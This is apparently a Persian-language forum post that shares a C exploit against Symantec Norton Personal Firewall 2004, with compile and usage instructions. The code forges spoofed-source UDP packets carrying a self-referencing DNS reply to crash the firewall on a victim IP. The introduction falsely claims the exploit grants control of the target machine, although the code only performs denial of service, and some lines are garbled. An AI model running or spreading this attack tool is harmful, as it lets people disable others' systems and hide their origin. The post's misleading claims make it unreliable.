این اکسپولیت کد از ضعف Fire Wall نرم افزار Symantec Norton و میتونه کنترل سیستم را که از فایروال مذکور استفاده میکنه در کنترل شما قرار بده!
منتظر نظرات دوستان هستم.
نحوه استفاده هم خیلی سر راسته کافی برنامه را کامپایل کنید و اجرا کنید نحوه وارد کردن سوئیچ ها را مشاهده خواهید کرد، برنامه فوق هم در لینوکس قابل کامپایل هست وهم در ویندوز.
/* HOD-symantec-firewall-DoS-expl.c: * Symantec Multiple Firewall DNS Response Denial-of-Service * ------------------------------------------------------------------- * Tested on: * - Symantec Norton Personal Firewall 2004 * Systems Affected: * ------------------------------------------------------------------- * Compile: * Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib * Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib * Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall * * ------------------------------------------------------------------- * Command Line Parameters/Arguments: * * HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int] * * -fi:IP From (sender) IP address * -tp:int To (recipient) port number * -ti:IP To (recipient) IP address * -n:int Number of times to send message */ #ifdef _WIN32 #pragma comment(lib,"ws2_32") #pragma pack(1) #define WIN32_LEAN_AND_MEAN #include <winsock2.h> #include <ws2tcpip.h> /* IP_HDRINCL */ #include <stdio.h> #include <stdlib.h> #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #include <string.h> #endif #define MAX_MESSAGE 4068 #define MAX_PACKET 4096 #define DEFAULT_PORT 53 #define DEFAULT_IP "10.0.0.1" #define DEFAULT_COUNT 1 #ifndef _WIN32 #define FAR #endif /* Define the DNS header */ char dnsreply[] = "\xc9\x9c" /* Transaction ID */ "\x80\x00" /* Flags (bit 15: response) */ "\x00\x01" /* Number of questions */ "\x00\x01" /* Number of answer RRs */ "\x00\x00" /* Number of authority RRs */ "\x00\x00" /* Number of additional RRs */ "\xC0\x0C" /* Compressed name pointer to itself */ typedef unsigned char BYTE; typedef unsigned short WORD; typedef unsigned int DWORD; typedef unsigned long LWORD; typedef char SBYTE; typedef int SDWORD; /* Define the IP header */ typedef struct ip_hdr { BYTE ip_verlen; /* IP version & length */ BYTE ip_tos; /* IP type of service */ WORD ip_totallength; /* Total length */ WORD ip_id; /* Unique identifier */ WORD ip_offset; /* Fragment offset field */ BYTE ip_ttl; /* Time to live */ BYTE ip_protocol; /* Protocol */ WORD ip_checksum; /* IP checksum */ DWORD ip_srcaddr; /* Source address */ DWORD ip_destaddr; /* Destination address */ } IP_HDR, *PIP_HDR, FAR* LPIP_HDR; /* Define the UDP header */ typedef struct udp_hdr { WORD src_portno; /* Source port number */ WORD dst_portno; /* Destination port number */ WORD udp_length; /* UDP packet length */ WORD udp_checksum; /* UDP checksum (optional) */ } UDP_HDR, *PUDP_HDR; /* globals */ LWORD dwToIP, // IP to send to dwFromIP; // IP to send from (spoof) WORD iToPort, // Port to send to iFromPort; // Port to send from (spoof) LWORD dwCount; // Number of times to send SBYTE strMessage[MAX_MESSAGE]; // Message to send void usage(SBYTE *progname){ printf("Usage:\n\n"); printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", progname); printf(" -fi:IP From (sender) IP address\n"); printf(" -tp:int To (recipient) open UDP port number:\n"); printf(" 137, 138, 445, 500(default)\n"); printf(" -ti:IP To (recipient) IP address\n"); printf(" -n:int Number of times\n"); exit(1); } void ValidateArgs(SDWORD argc, SBYTE **argv){ SDWORD i; iToPort = 500; iFromPort = DEFAULT_PORT; dwToIP = inet_addr(DEFAULT_IP); dwFromIP = inet_addr(DEFAULT_IP); dwCount = DEFAULT_COUNT; memcpy(strMessage, dnsreply, sizeof(dnsreply)-1); for(i = 1; i < argc; i++) { if ((argv[i][0] == '-') || (argv[i][0] == '/')) { switch (tolower(argv[i][1])) { case 'f': switch (tolower(argv[i][2])) { case 'i': if (strlen(argv[i]) > 4) dwFromIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 't': switch (tolower(argv[i][2])) { case 'p': if (strlen(argv[i]) > 4) iToPort = atoi(&argv[i][4]); break; case 'i': if (strlen(argv[i]) > 4) dwToIP = inet_addr(&argv[i][4]); break; default: usage(argv[0]); break; } break; case 'n': if (strlen(argv[i]) > 3) dwCount = atol(&argv[i][3]); break; default: usage(argv[0]); break; } } } return; } /* This function calculates the 16-bit one's complement sum */ /* for the supplied buffer */ WORD checksum(WORD *buffer, SDWORD size){ LWORD cksum=0; while (size > 1) { cksum += *buffer++; size - = sizeof(WORD); } if (size) { cksum + = *(BYTE *)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum + = (cksum >>16); return (WORD)(~cksum); } /* Main Function */ SDWORD main(SDWORD argc, BYTE **argv){ #ifdef _WIN32 WSADATA wsd; #endif SDWORD s; #ifdef _WIN32 BOOL bOpt; #else SDWORD bOpt; #endif struct sockaddr_in remote; IP_HDR ipHdr; UDP_HDR udpHdr; SDWORD ret; LWORD i; WORD iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize, cksum = 0; BYTE buf[MAX_PACKET],*ptr = NULL; #ifdef _WIN32 IN_ADDR addr; #else struct sockaddr_in addr; #endif printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n"); if (argc < 3) usage(argv[0]); ValidateArgs(argc, argv); #ifdef _WIN32 addr.S_un.S_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort); addr.S_un.S_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort); #else addr.sin_addr.s_addr = dwFromIP; printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iFromPort); addr.sin_addr.s_addr = dwToIP; printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr.sin_addr), iToPort); #endif printf("[*] Count: %d\n", dwCount); #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) { printf("[-] WSAStartup() failed: %d\n", GetLastError()); return -1; } #endif /* Creating a raw socket */ s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); #ifdef _WIN32 if (s == INVALID_SOCKET) { printf("[-] WSASocket() failed: %d\n", WSAGetLastError()); return -1; } #endif /* Enable the IP header include option */ #ifdef _WIN32 bOpt = TRUE; #else bOpt = 1; #endif ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (SBYTE *)&bOpt, sizeof(bOpt)); #ifdef _WIN32 if (ret == SOCKET_ERROR) { printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError()); return -1; } #endif /* Initalize the IP header */ iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1; iIPVersion = 4; iIPSize = sizeof(ipHdr) / sizeof(LWORD); ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize; ipHdr.ip_tos = 0; /* IP type of service */ ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */ ipHdr.ip_id = 0; /* Unique identifier: set to 0 */ ipHdr.ip_offset = 0; /* Fragment offset field */ ipHdr.ip_ttl = 128; /* Time to live */ ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */ ipHdr.ip_checksum = 0 ; /* IP checksum */ ipHdr.ip_srcaddr = dwFromIP; /* Source address */ ipHdr.ip_destaddr = dwToIP; /* Destination address */ /* Initalize the UDP header */ iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1; udpHdr.src_portno = htons(iFromPort) ; udpHdr.dst_portno = htons(iToPort) ; udpHdr.udp_length = htons(iUdpSize) ; udpHdr.udp_checksum = 0; iUdpChecksumSize = 0; ptr = buf; memset(buf, 0, MAX_PACKET); memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr)); ptr += sizeof(ipHdr.ip_srcaddr); iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr); memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr)); ptr += sizeof(ipHdr.ip_destaddr); iUdpChecksumSize += sizeof(ipHdr.ip_destaddr); ptr++; iUdpChecksumSize += 1; memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol)); ptr += sizeof(ipHdr.ip_protocol); iUdpChecksumSize += sizeof(ipHdr.ip_protocol); memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length)); ptr += sizeof(udpHdr.udp_length); iUdpChecksumSize += sizeof(udpHdr.udp_length); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); iUdpChecksumSize += sizeof(udpHdr); for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++) *ptr = strMessage[i]; iUdpChecksumSize += sizeof(dnsreply)-1; cksum = checksum((WORD *)buf, iUdpChecksumSize); udpHdr.udp_checksum = cksum; memset(buf, 0, MAX_PACKET); ptr = buf; memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr); memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr); memcpy(ptr, strMessage, sizeof(dnsreply)-1); remote.sin_family = AF_INET; remote.sin_port = htons(iToPort); remote.sin_addr.s_addr = dwToIP; for(i = 0; i < dwCount; i++) { #ifdef _WIN32 ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote)); if (ret == SOCKET_ERROR) { printf("[-] sendto() failed: %d\n", WSAGetLastError()); break; } else #else ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote, sizeof(remote)); #endif printf("[+] sent %d bytes\n", ret); } #ifdef _WIN32 closesocket(s); WSACleanup(); #else close(s); #endif return 0; }
